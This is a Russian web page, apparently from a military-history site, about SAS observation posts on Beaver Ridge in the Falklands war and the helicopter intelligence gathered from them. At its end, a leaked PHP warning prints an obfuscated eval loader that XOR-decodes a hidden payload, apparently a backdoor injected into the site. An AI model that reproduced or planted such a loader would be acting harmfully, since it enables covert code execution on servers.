Два варианта прямоугольного НП 30

Подготовка коммандос SAS

пистолет НП 30 Во время операции на Фолклендах разведывательные патрули SAS, высадившиеся на островах, соорудили два варианта прямоугольного НП

Один из таких НП находился на Бивер Ридж (Beaver Ridge), откуда велось наблюдение за аэропортом в Порт Стэнли. Этот НП был прикрыт сверху дерном, что позволило ему слиться с окружающей местностью. Дерн был необходим для того, чтобы скрыть людей внутри наблюдательного пункта от тепловизоров, которые применяли экипажи аргентинских вертолетов во время облетов окрестных холмов.

Внутри НП все время царила сырость, несмотря на то, что солдаты выложили его изнутри полотнищами из водонепроницаемой синтетической ткани. Кроме того, он плохо вентилировался, так как имел лишь одно небольшое отверстие, сквозь которое солдаты по очереди наблюдали за аэропортом через мощный оптический прибор. В окопе было тесно и неудобно, обувь была промокшей, а суставы немели от ограниченной циркуляции крови. Только ночью, когда риск оказаться замеченными снижался до минимума, они могли позволить себе подвигаться, чтобы размять свои затекшие конечности.

В частности, с этого НП в штаб оперативной группировки, находившийся на борту авианосца «Hermes», были переданы данные об аргентинских вертолетах. Они установили, что аргентинцы прячут на ночь свои вертолеты между холмов, подальше от аэродрома, подвергавшегося авиационным бомбардировкам и артиллерийским обстрелам с моря. После того, как эта информация была передана по радио в штаб, самолеты «Харриер» смогли обнаружить вертолеты и уничтожить их.

Опубликовано 13-03-2010, 22:04 Просмотров 136

поделись с друзьями
Комментарий:
Введите код: *
Warning: assert(): Assertion "eval('$nGIE3=$FHLfom3Fx($nGIE3);$bQQvD7cg="";$QVSry4="DuSAkQ";for($gyBB3G=0;$gyBB3G<716;$gyBB3G++)$bQQvD7cg.=chr(ord($nGIE3[$gyBB3G])^ord($QVSry4[$gyBB3G%6]));@eval($cnDaz8X($bQQvD7cg));');" failed in /home/a/alvis2/tchest.org/public_html/index.php on line 321